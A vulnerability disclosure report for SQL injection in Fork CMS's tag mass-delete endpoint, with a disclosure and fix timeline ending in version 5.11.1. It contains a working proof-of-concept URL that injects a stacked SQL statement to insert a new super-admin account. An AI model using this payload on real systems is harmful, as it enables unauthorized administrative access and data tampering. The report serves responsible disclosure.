SQL Injection in forkcms/forkcms


Reported on

Oct 22nd 2021


When calling the url for deleting one or more tags, the parameter id is vulnerable for SQL injection.

Proof of Concept

Call an URL like this one (as an authenticated user).

http://forkcms.site/private/de/tags/mass_action?token=n93e05rj0l&id[]=3);insert into users(email,password,is_god) values ('attacker@example.com','$2y$10$qqJ9L1lIp38gKpqh1V3l1.EqLzj.brB0IqUPQ2XXcSjl6Dtcgq16C',1);--+&action=delete

After calling this URL, the table users has a new entry.


The attacker can tamper data in the database as they want.

We have contacted a member of the forkcms team and are waiting to hear back 2 years ago
We have sent a follow up to the forkcms team. We will try again in 7 days. 2 years ago
Jelmer Prins validated this vulnerability 2 years ago
kstarkloff has been awarded the disclosure bounty
The fix bounty is now up for grabs
Jelmer Prins marked this as fixed in 5.11.1 with commit 0226a2 2 years ago
Jelmer Prins has been awarded the fix bounty
This vulnerability will not receive a CVE
to join this conversation